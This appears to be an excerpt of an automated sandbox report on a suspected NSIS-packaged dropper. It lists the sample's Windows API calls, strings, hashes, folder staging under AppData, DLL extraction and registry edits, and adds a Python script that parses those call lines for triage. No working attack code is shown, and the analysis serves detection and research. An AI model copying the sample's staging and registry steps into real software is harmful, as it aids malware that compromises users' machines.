                                                                        Similarity
                                                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: "C:\Users\user\Desktop\160420241245287.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\opbevaringssteder$Control Panel\Desktop\ResourceLocale$ExecToStack$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                        • API String ID: 914957316-1609039486
                                                                        • Opcode ID: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                        • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                        • Opcode Fuzzy Hash: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                        • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (function 00403C57; legend: Executed / Not Executed; rendered basic-block graph omitted, its API calls are listed under APIs below)
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                        • ShowWindow.USER32(?), ref: 00403CB0
                                                                        • DestroyWindow.USER32 ref: 00403CC4
                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                        • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
                                                                        • IsWindowEnabled.USER32(00000000), ref: 00403D1C
                                                                        • GetDlgItem.USER32(?,00000001), ref: 00403DCA
                                                                        • GetDlgItem.USER32(?,00000002), ref: 00403DD4
                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
                                                                        • GetDlgItem.USER32(?,00000003), ref: 00403EE5
                                                                        • ShowWindow.USER32(00000000,?), ref: 00403F06
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F18
                                                                        • EnableWindow.USER32(?,?), ref: 00403F33
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
                                                                        • EnableMenuItem.USER32(00000000), ref: 00403F50
                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
                                                                        • lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
                                                                        • SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
                                                                        • ShowWindow.USER32(?,0000000A), ref: 004040EC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                        • String ID:
                                                                        • API String ID: 3282139019-0
                                                                        • Opcode ID: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                        • Instruction ID: 25e1393ee42f6df426570fd4a537ecf3dcaf9ce603c4882d15cf919a8637c385
                                                                        • Opcode Fuzzy Hash: d3e31c762ced5e7f3f9f31fdb6bfb00df4bf7f17a487b0a05df9e2eacf633d02
                                                                        • Instruction Fuzzy Hash: 2FC1A071A08205BBDB206F61ED49E3B3A68FB89745F40053EF601B15F1CB799852DB2E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph (function 00402DBC; legend: Executed / Not Executed; rendered basic-block graph omitted, its API calls are listed under APIs below)
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00402DD0
                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\160420241245287.exe,00000400), ref: 00402DEC
                                                                          • Part of subcall function 00405B56: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\160420241245287.exe,80000000,00000003), ref: 00405B5A
                                                                          • Part of subcall function 00405B56: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7C
                                                                        • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\160420241245287.exe,C:\Users\user\Desktop\160420241245287.exe,80000000,00000003), ref: 00402E35
                                                                        • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                        • String ID: "C:\Users\user\Desktop\160420241245287.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\160420241245287.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                        • API String ID: 2803837635-643458308
                                                                        • Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                        • Instruction ID: 37f794aabb7b6cc22e4429bd010eaec377b65274dead3bcbf73b1a6bf24b43e2
                                                                        • Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
                                                                        • Instruction Fuzzy Hash: FB610571940205ABDB20AF65DD89BAE3AB8EB04359F20417BF505B32D1C7BC9E41DB9C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        (graph image not reproduced; the original colours blocks as executed / not executed) entry block 401752-401777; API call sites: lstrcatW @401781, CompareFileTime @4017b0, SetFileTime @4018a1, FindCloseChangeNotification @4018b3, lstrcatW @4018c9; falls through to the shared epilogue 4029c7-4029d6.
                                                                        APIs
                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
                                                                        • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs,?,?,00000031), ref: 004017B8
                                                                          • Part of subcall function 00405EEA: lstrcpynW.KERNEL32(?,?,00000400,004033C8,004281E0,NSIS Error), ref: 00405EF7
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                          • Part of subcall function 00405194: lstrlenW.KERNEL32(00402D94,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                          • Part of subcall function 00405194: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00402D94), ref: 004051EF
                                                                          • Part of subcall function 00405194: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll), ref: 00405201
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                          • Part of subcall function 00405194: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1649617537.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649648353.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.000000000042E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649662426.0000000000447000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000044E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1649777013.000000000048A000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs$ExecToStack
                                                                        • API String ID: 1941528284-121982121
                                                                        • Opcode ID: a7b38559c55b838a7027a09bf7c005228421b1de4cb974c8e4522ac4ff3c4e27
                                                                        • Instruction ID: bc5e94bc6114b027384bbb583ab77f55914405742357509a7a45d2f14902e26b
                                                                        • Opcode Fuzzy Hash: a7b38559c55b838a7027a09bf7c005228421b1de4cb974c8e4522ac4ff3c4e27
                                                                        • Instruction Fuzzy Hash: 0541A071900515BACF10BBB5CC46DAF7A78EF05368B20863BF521B11E2D73C8A419A6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        (graph image not reproduced; the original colours blocks as executed / not executed) entry block 405194-4051a9; API call sites: lstrlenW @4051cb, lstrlenW @4051d9, lstrcatW @4051eb, SetWindowTextW @4051fa, SendMessageW x3 @40520d-40524f; returns through 405260-405264.
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
                                                                        • lstrlenW.KERNEL32(00402D94,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 004051DC
                                                                        • lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00402D94), ref: 004051EF
                                                                        • SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll), ref: 00405201
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405227
                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405241
                                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: same twelve .sdmp dumps as listed in the record above (identical list omitted)
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                        • String ID: Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll
                                                                        • API String ID: 2531174081-446190933
                                                                        • Opcode ID: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                        • Instruction ID: f08454111491fc0d39351af24b8902c1f97f976603b555b028d64c931b302e29
                                                                        • Opcode Fuzzy Hash: 0c094884f043220e68d7ccf46313e42316ed39ffe4743c8b7e21410a54c3b4f2
                                                                        • Instruction Fuzzy Hash: 42219D71900518BACB119FA5DD84ADFBFB8EF44354F54807AF904B62A0C7798A41DFA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        (graph image not reproduced; the original colours blocks as executed / not executed) entry block 40317d-4031a6 (GetTickCount); API call sites: SetFilePointer @4031ac, WriteFile @403271, SetFilePointer @4032c8; block 4032af-4032c2 loops back to 4031dc; calls into 402d1a (@4032e7, @403228), 40330f and 406390; exits through 4032f1-4032f6.
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00403192
                                                                          • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                        • WriteFile.KERNELBASE(0040BE78,00410D5C,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                        • SetFilePointer.KERNELBASE(0008E5B9,00000000,00000000,00413E78,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: same twelve .sdmp dumps as listed in the first full record above (identical list omitted)
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: File$Pointer$CountTickWrite
                                                                        • String ID: \A$x>A
                                                                        • API String ID: 2146148272-2511885664
                                                                        • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                        • Instruction ID: e2b2982e6b1d623d5d036838b7619e310c478df2cbc778b1b7af49cc7c53be0d
                                                                        • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                                        • Instruction Fuzzy Hash: 2A41AC72504201DFDB10AF29ED848A63BACFB54315720827FE910B22E0D7799D81DBED
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        (graph image not reproduced; the original colours blocks as executed / not executed) entry block 4015b9-4015cd; API call sites: CreateDirectoryW @4015cf, with GetLastError @4015ed and GetFileAttributesW @4015fa on the failure path and 40160a-401612 looping back to the CreateDirectoryW block; SetCurrentDirectoryW @401619; exits through the shared epilogue 4029c7-4029d6.
                                                                        APIs
                                                                          • Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,74DF2EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\160420241245287.exe"), ref: 004059EE
                                                                          • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 004059F3
                                                                          • Part of subcall function 004059E0: CharNextW.USER32(00000000), ref: 00405A0B
                                                                        • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                        • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs,?,00000000,000000F0), ref: 00401630
                                                                        Strings
                                                                        • C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs, xrefs: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: same twelve .sdmp dumps as listed in the first full record above (identical list omitted)
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                        • String ID: C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs
                                                                        • API String ID: 3751793516-3154209270
                                                                        • Opcode ID: 05b28ac8e60e3321a7284e54e3749bb0ea51052cb39d8f8e340da353c49dd174
                                                                        • Instruction ID: 793db7a5d63411832aed35bcc9698a3b838560232fc9f0aff2bd133e4d1ca9b1
                                                                        • Opcode Fuzzy Hash: 05b28ac8e60e3321a7284e54e3749bb0ea51052cb39d8f8e340da353c49dd174
                                                                        • Instruction Fuzzy Hash: 8E11C271904100EBDF206FA0CD449AF7AB4FF14369B34463BF882B62E1D23D4941DA6E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%
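The "APIs" lines in these function records are the raw material for triage: which Win32 calls a function makes, in what order, and which file paths the sandbox observed as arguments. The Python below is an added example, not part of the Joe Sandbox report or its tooling. It parses lines in the report's `• Api.Module(args), ref: addr` form (including the indented "Part of subcall function" lines), recovers call order from the `ref` addresses, and pulls out every Windows path an argument carries. The sample lines are copied from the records on this page and assembled into one constructed input; the staging-directory rule (`\AppData\Roaming\`, `\AppData\Local\Temp\`) is an analyst heuristic assumed by this example, not something the report asserts.

```python
import re

# Constructed sample input: seven "APIs" lines copied from the 4015B9 and 401752
# records on this page, in the report's own "• Api.Module(args), ref: addr" form.
# Deliberately mixes direct calls with "Part of subcall function" lines.
SAMPLE_API_LINES = r"""
• Part of subcall function 004059E0: CharNextW.USER32(?,?,00424ED8,?,00405A54,00424ED8,00424ED8,?,?,74DF2EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,74DF2EE0,"C:\Users\user\Desktop\160420241245287.exe"), ref: 004059EE
• CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
• GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs,?,00000000,000000F0), ref: 00401630
• CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Roaming\opbevaringssteder\coryphene\Foldedrs,?,?,00000031), ref: 004017B8
• Part of subcall function 00405194: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsf6B4D.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 004051CC
"""

# One report line: optional bullet, optional "Part of subcall function XXXXXXXX:",
# then Api.Module(args), ref: XXXXXXXX.  The greedy args group backtracks to the
# final "), ref:" so commas and quotes inside arguments are preserved.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# A drive-letter path; stops at the argument separators the report uses.
WIN_PATH = re.compile(r'[A-Za-z]:\\[^,"()]+')

# Heuristic (assumption of this example): user-writable roots that droppers
# commonly unpack into.  Plain strings, since a raw string cannot end in "\".
STAGING_MARKERS = ("\\AppData\\Roaming\\", "\\AppData\\Local\\Temp\\")


def parse_api_lines(text):
    """Parse report 'APIs' lines into dicts; non-matching lines are skipped."""
    records = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        records.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "subcall": m.group("subcall"),   # None for a direct call from this function
            "args": [a.strip() for a in m.group("args").split(",")],
            "ref": int(m.group("ref"), 16),  # call-site address as an int
        })
    return records


def api_sequence(records, include_subcalls=False):
    """API names in call-site address order; subcall lines excluded by default."""
    chosen = [r for r in records if include_subcalls or r["subcall"] is None]
    return [r["api"] for r in sorted(chosen, key=lambda r: r["ref"])]


def extract_paths(records):
    """Every Windows path found in any argument, deduplicated."""
    paths = set()
    for r in records:
        for arg in r["args"]:
            paths.update(WIN_PATH.findall(arg))
    return paths


def staging_paths(paths):
    """Subset of paths under the assumed staging roots (case-insensitive)."""
    return {p for p in paths
            if any(marker.lower() in p.lower() for marker in STAGING_MARKERS)}


if __name__ == "__main__":
    recs = parse_api_lines(SAMPLE_API_LINES)
    print("call order:", " -> ".join(api_sequence(recs)))
    for p in sorted(staging_paths(extract_paths(recs))):
        print("staging path:", p)
```

Keeping the direct calls separate from the "Part of subcall function" lines matters: the subcall lines are inlined from callees and repeat across every record that reaches them, so counting them as this function's own calls inflates the sequence. The `ref` address, not line order, is what gives call order once records from several functions are merged.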

                                                                        Control-flow Graph

                                                                        (graph image not reproduced; the original colours blocks as executed / not executed) entry block 402b7a-402ba3 (RegOpenKeyExW); API call sites: RegEnumKeyW @402bcb, with block 402bb7-402bc9 recursing back into 402b7a for each enumerated subkey, RegCloseKey @402bdd and @402c02, RegDeleteKeyW @402c1d; exits through 402c0e-402c12.
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: same twelve .sdmp dumps as listed in the first full record above (identical list omitted)
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_160420241245287.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DeleteEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1912718029-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph: basic blocks 403062-40317a, calling SetFilePointer, ReadFile and WriteFile (graph image omitted; legend: Executed / Not Executed)
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                                        • WriteFile.KERNELBASE(00000000,00413E78,?,000000FF,00000000,00413E78,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: File$PointerWrite
                                                                        • String ID: x>A
                                                                        • API String ID: 539440098-3854404225
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph: basic blocks 405b85-405bd7, calling GetTickCount and GetTempFileNameW (graph image omitted; legend: Executed / Not Executed)
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405BA3
                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                        • API String ID: 1716503409-678247507
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                        • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                        • RegSetValueExW.KERNELBASE(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                        • RegCloseKey.KERNELBASE(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: CloseCreateValuelstrlen
                                                                        • String ID:
                                                                        • API String ID: 1356686001-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                          • Part of subcall function 0040617E: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\160420241245287.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 004061E1
                                                                          • Part of subcall function 0040617E: CharNextW.USER32(?,?,?,00000000), ref: 004061F0
                                                                          • Part of subcall function 0040617E: CharNextW.USER32(?,"C:\Users\user\Desktop\160420241245287.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 004061F5
                                                                          • Part of subcall function 0040617E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 00406208
                                                                        • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403512), ref: 00403347
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1649632248.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Similarity
                                                                        • API ID: Char$Next$CreateDirectoryPrev
                                                                        • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 4115351271-517883005
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
